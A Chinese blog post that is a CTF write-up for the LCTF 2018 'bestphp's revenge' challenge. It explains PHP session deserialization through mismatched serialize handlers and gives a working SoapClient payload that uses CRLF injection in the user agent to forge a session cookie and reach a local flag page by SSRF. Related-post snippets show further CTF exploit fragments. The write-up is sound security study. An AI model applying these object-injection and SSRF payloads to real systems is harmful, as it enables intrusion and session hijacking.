bestphp‘s revenge

最新推荐文章于 2023-02-20 19:07:43 发布
最新推荐文章于 2023-02-20 19:07:43 发布
阅读量165 收藏
点赞数
分类专栏: session # ctf做题记录 SSRF 文章标签: php ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/116136245
版权
ctf做题记录 同时被 3 个专栏收录
49 篇文章 4 订阅
订阅专栏
SSRF
7 篇文章 0 订阅
订阅专栏
session
2 篇文章 0 订阅
订阅专栏

上来就是源码

<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>

call_user_func无法调用一些危险函数,猜测是要利用session,就去看了一下session反序列化
php session反序列化
php有三个反序列化引擎
在这里插入图片描述
php引擎的存储格式是键名 | serialized_string,而php_serialize引擎的存储格式是serialized_string。如果程序使用两个引擎来分别处理的话就会出现问题。
我们先用php_serialize引擎处理session

#test.php
<?php
    ini_set("session.serialize_handler","php_serialize");
    session_start();
    $_SESSION['name'] = $_GET['a'];
    var_dump($_SESSION);

接下来用php引擎处理session文件

#test1.php
<?php
    ini_set('session.serialize_handler','php');
    session_start();
    class person{
        public $name;
        public $age;
         function __destruct(){
            echo 'hello '.$this->name;
        }
    }

payload:

<?php
    class person{
        public $name;
        public $age;
        public function __construct(){
            $this->name = 'fmyyy';
        }
    }
    
    $o = new person();
    echo serialize($o);

O:6:"person":2:{s:4:"name";s:5:"fmyyy";s:3:"age";N;}
在最前面加上|
变成
|O:6:"person":2:{s:4:"name";s:5:"fmyyy";s:3:"age";N;}
然后在test.php提交,之后访问test1.php
在这里插入图片描述
可以看到反序列化成功,看一下session文件里面的内容。
a:1:{s:4:"name";s:60:"|O:6:"person":2:{s:4:"name";s:5:"fmyyy";s:3:"age";s:2:"20";}
之前我们说过,在php这个反序列化引擎中,|是键名和键值的分隔符,所以前部分a:1:{s:4:"name";s:60:"变成了了键名,解析session文件是会自动对 | 后面的数据做反序列化处理,这在官方文档里有说明
在这里插入图片描述
为了方便理解 我们用var_dump(get_defined_vars());输出所有已定义的变量,看到这一段
&array(1) { ["a:1:{s:4:"name";s:60:""]=> object(person)#1 (2) { ["name"]=> string(5) "fmyyy" ["age"]=> string(2) "20" } } } 这样session反序列化的原理就非常清楚了。
虽然清楚了原理但还是找不到下手的地方,无奈之下只好参考wp。还需要利用下面两个知识点,学到了学到了。
CRLF Injection漏洞
从几道CTF题看SOAP安全问题
简单来说, SoapClient是php的内置类,可以发送http请求。
public SoapClient :: SoapClient (mixed $wsdl [,array $options ]

<?php
$target = "http://127.0.0.1/flag.php";
$attack = new SoapClient(null,array('location' => $target,
    'user_agent' => "N0rth3ty\r\nCookie: PHPSESSID=g6ooseaeo905j0q4b9qqn2n471\r\n",
    'uri' => "123"));
$payload = urlencode(serialize($attack));
echo $payload;
?>

第一次传值
在这里插入图片描述

第二次
?f=extract POST: b=call_user_func
最后用我们的设置的cookie访问index.php拿到flag
在这里插入图片描述

fmyyy1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
------已搬运-------BUUCTF:LCTFbestphp‘s revenge
Zero_Adam的博客
02-01 508
我弄这个题一整天了,晚上不出意外的话还得看,先这样吧。。 里面还有很多疑问点,希望能有大佬指点 要用到的很多很多的知识点,,, sesion反序列化–>soap(ssrf+crlf)–>call_user_func激活soap类(抄袭的,我哪能总结出来啊,,,) call_user_func函数 这个我自己总结的,看看 自己写的 extract extract()函数,从数组中把变量导入当前页面,相同的变量会被覆盖。 所以下面的b=extract,同时$POST是一个数组,所以符合 reset(
bestphp's revenge
沐目的博客
11-08 2001
1.知识点 1.1 SoapClient(待完善) 这是一个php内置的类,当__call方法被触发后,它可以发送HTTP和HTTPS请求。具体的还不太懂,只知道它可以用来造成ssrf漏洞。 <?php $target = "http://127.0.0.1/flag.php"; $attack = new SoapClient(null,array('location' => $ta...
bestphp‘s revenge 1
最新发布
m0_62129839的博客
02-20 154
因为$b变量已经被我们覆盖成了call_user_func,那么此时的程序,就变成了call_user_func(call_user_func,array($_session,‘welcome_to_the_lctf2018’));9. $_session这个对象,会去调用“welcome_to_the_lctf2018”这个不存在的方法,于是__call方法被。
BUU-bestphp‘revenge
unexpectedthing的博客
02-11 797
文章目录前言WPcall_user_func函数php中session反序列化机制构造SSRF之SoapClient类CRLF Injection漏洞解题步骤总结 前言 这个题主要综合了很多知识点,特别综合 考点: session反序列化 原生类SoapClient的SSRF 变量覆盖 CRLF WP 首页代码 <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_st
bestphp‘s revenge/ 安洵杯Babyphpphpsession题目)
qq_62046696的博客
11-30 1003
改变phpsessionid为我们编写代码的那个值就可以获得flag大概思路是这样,等题目上平台,再复现。
[LCTF]bestphp‘s revenge
qq_45691294的博客
09-25 830
知识点:session反序列化->soap(ssrf+crlf)->call_user_func激活soap类 题目直接提供了index.php和flag.php的源码 //index.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'
bestphp‘s revenge SoapClient php处理器反序列化 call_user_func
scrawman的博客
12-08 611
bestphp’s revenge 这道题的知识点还挺多的 源码文件有两个:index.php和flag.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION); $a =
LCTF2018-bestphp‘s revenge
weixin_43610673的博客
06-19 495
<?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION);//打印出seesion的内容 $a = array(reset($_SESSION), 'welcome_to_the_lc
[网鼎杯2018]Unfinish
fmyyy1的博客
04-15 2151
场景 既然有login.php那就会有register.php,访问。 注册一个账号进去。 登录进去后看到我们的用户名了。 猜测在用户名处存在二次注入,再注册一个账号。 用户名变成了0,证明存在二次注入。 fuzz之后发现逗号,information等许多关键字被过滤了。 绕过方法: mysql中,+只能当做运算符。 执行select '1'+'1a'时 结果 执行select '0'+database(); 编程了0,但我们可以用ascii编码进行计算。 select '0'+ascii(
[HFCTF2020]EasyLogin
fmyyy1的博客
04-13 2001
对js不是很了解,这题边看wp边学。 是一个登录界面。 注册一个账号登录 flag没有显示,看源码。 看到了app.js,访问可看到源码。 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val(); const password = $("#password").val(); const token =
[极客大挑战 2020]Greatphp
fmyyy1的博客
05-22 1331
知识点 php原生类的利用 源码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
[GYCTF2020]Ezsqli
fmyyy1的博客
04-05 1255
查询界面,猜测sql注入,查询抓包 fuzz后发现information_schema,or,union等关键字被过滤了,应该是要无列名注入。 用^代替or id=0^(length(database())>1) 证明存在sql注入 InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列.
[WMCTF2020]Make PHP Great Again
fmyyy1的博客
05-25 1245
源码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 解法一 这一看就是session.upload_progress文件包含 import io import requests import threading sessid = 'bbbbbbb' data = {"cmd":"system('cat flag.ph
[HFCTF2020]JustEscape
fmyyy1的博客
04-13 1092
场景 最低行提示不是php,测试过后发现是nodejs。 是vm2的沙箱逃逸问题。 github上有现成的poc https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(
ctfshow nodejs篇
fmyyy1的博客
07-16 1010
334 源码给了 登录成功就能拿到flag var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item
[ISITDTU 2019]EasyPHP
fmyyy1的博客
04-27 952
这题有点儿复杂 参考 上来就是源码 <?php highlight_file(__FILE__); $_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) die('rosé will not do it'); if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd ) die('you are so close,
[GYCTF2020]Easyphp
fmyyy1的博客
04-19 908
反序列化字符逃逸。 场景 www.zip下载源码。下载到4个php文件。 #login.php <?php require_once('lib.php'); ?> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>login</title> <center> <form action="login.php" method="post

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值